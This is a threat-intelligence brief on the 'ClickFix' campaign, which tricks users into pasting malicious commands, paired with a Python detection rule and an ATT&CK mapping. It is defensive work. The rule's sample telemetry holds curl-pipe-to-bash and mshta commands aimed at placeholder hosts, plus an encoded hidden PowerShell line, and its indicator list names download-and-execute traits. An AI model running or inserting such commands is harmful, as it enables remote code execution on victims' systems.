EXECUTIVE SUMMARY:
The attack known as the “ClickFix” campaign uses a deceptively simple but effective social-engineering ploy: users are shown a bogus message that urges them to run a “fix” step and follow instructions. These instructions typically ask the user to open a system dialog or terminal, paste in code, or download a “helper” application. The campaign has evolved rapidly — once primarily targeting Windows via a fake browser update or fix, it now adapts its lure to macOS, Linux and even mobile environments, tailoring the message to the victim’s operating system. For example, on macOS the lure instructs the user to run commands in Terminal, while on Windows the user is asked to open the Run dialog and execute a command. This shift underscores the growing sophistication of the scheme and its reliance on tricking the user into executing the malware rather than exploiting vulnerabilities in software.
The attack chain starts with redirection or malvertising that delivers a landing page engineered to look legitimate — for instance, a faux “OS update required” prompt or a “Click to verify” page that mimics trusted services. The user is prompted to paste a command, which hidden JavaScript on the page has already placed on the clipboard, into a system dialog or Terminal. Once executed, the command downloads or invokes malicious code — often an infostealer, remote-access trojan or loader. These payloads may run fileless or load additional modules, exfiltrate credentials, establish persistence, and evade detection. The campaign is notable for its OS-aware approach (offering commands tailored to the system), its use of legitimate utilities, its clipboard hijacking, and the fact that many security gateways miss it because the user explicitly invokes the command. The result: the user’s own interaction enables the compromise.
The ClickFix campaign exemplifies the shift in cyber-threat tactics from purely technical exploits toward social engineering plus legitimate tools. Because so much depends on user action — opening a Run dialog, pasting a command, executing it — traditional defenses (blocking malicious attachments, scanning downloads) may be insufficient. Mitigation therefore must emphasise user education, limiting privileged use of system dialogs like Run/Terminal, and monitoring for unusual command-line executions or unexpected downloads post-user action. Organisations should deploy endpoint detection & response (EDR) that watches for these manually triggered commands and subsequent payloads.
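The monitoring recommended above can be expressed as a simple detection rule. The following is an added example, not part of the original brief: a Python heuristic that scans process-creation events (shaped like Sysmon Event ID 1 or EDR telemetry; the field names, the list of interactive parent processes and the indicator regexes are assumptions) and flags an interpreter launched from a user-driven surface such as the Run dialog (explorer.exe) or a terminal app when its command line shows two or more campaign-typical traits. The sample events, hostnames and URLs are constructed placeholders, not real indicators.

```python
"""Added example: heuristic detection of ClickFix-style, user-pasted command execution.

Scans constructed process-creation events and raises a finding when an interpreter
or LOLBin is started from an interactive parent (Run dialog, terminal) with a command
line that carries two or more campaign-typical traits. Field names are an assumption.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Parent images that represent a user-driven entry point (Run dialog, terminal apps).
# Assumed list; extend it for the terminals and launchers present in your estate.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2", "gnome-terminal", "konsole", "xterm"}
# Child interpreters and system binaries the brief associates with the campaign.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
                "bash", "sh", "zsh", "osascript"}

# Each indicator is (regex, human-readable reason). Two or more hits raise a finding.
INDICATORS = [
    (re.compile(r"-e(c|nc|ncodedcommand)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window requested"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline expression execution"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
     "network fetch inside command"),
    (re.compile(r"https?://", re.I), "URL on command line"),
    (re.compile(r"\|\s*(ba|z)?sh\b", re.I), "remote content piped into a shell"),
    (re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I), "mshta loading remote content (T1218)"),
    (re.compile(r"base64\s+(-d|--decode)\b", re.I), "base64 decode on the fly"),
]
MIN_HITS = 2


@dataclass
class Finding:
    host: str
    user: str
    parent: str
    image: str
    reasons: list[str]


def _basename(path: str) -> str:
    """Last path component, lowercased, for both Windows and POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def analyze(event: dict) -> Finding | None:
    """Return a Finding if the event looks like a user-pasted ClickFix command, else None."""
    parent = _basename(event["parent_image"])
    image = _basename(event["image"])
    # The discriminator the brief stresses: the command is invoked by the user's own
    # interactive action, not by a service, scheduler or installer.
    if parent not in INTERACTIVE_PARENTS or image not in INTERPRETERS:
        return None
    reasons = [label for rx, label in INDICATORS if rx.search(event["command_line"])]
    if len(reasons) < MIN_HITS:
        return None
    return Finding(event["host"], event["user"], parent, image, reasons)


def scan(events: list[dict]) -> list[Finding]:
    """Apply analyze() to a batch of events and keep only the findings."""
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed sample telemetry (hosts, users and URLs are placeholders, not real IoCs).
SAMPLE_EVENTS = [
    {"host": "WS-01", "user": "alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -NoProfile -enc AAAAPLACEHOLDERAAAA"},
    {"host": "WS-02", "user": "bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://lure-placeholder.invalid/verify.hta"},
    {"host": "MAC-01", "user": "carol",
     "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/bash",
     "command_line": '/bin/bash -c "curl -fsSL http://lure-placeholder.invalid/fix.sh | bash"'},
    # Benign: a user running a diagnostic from the Run dialog.
    {"host": "WS-03", "user": "dave", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c ipconfig /all"},
    # Benign: a scheduled-task script; not user-driven, so outside this rule's scope.
    {"host": "WS-04", "user": "SYSTEM", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {f.host} {f.user}: {f.parent} -> {f.image}: {', '.join(f.reasons)}")
```

The parent-process filter is what separates this rule from a generic "suspicious PowerShell" signature: the same encoded command launched by a scheduler is left for other rules, while a shell spawned from the Run dialog or a terminal with hidden-window, remote-fetch or pipe-to-shell traits is exactly the user-triggered execution the brief says gateways miss. Tune INTERACTIVE_PARENTS and MIN_HITS against your own baseline before alerting on it.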
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
|---|---|---|---|
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1204.002 | User Execution | Malicious File |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1106 | Native API Execution | — |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Entries |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | — |
| Defense Evasion | T1218.011 | System Binary Proxy Execution | Rundll32 |
| Collection | T1005 | Data from Local System | — |
| Command & Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The following reports contain further technical details: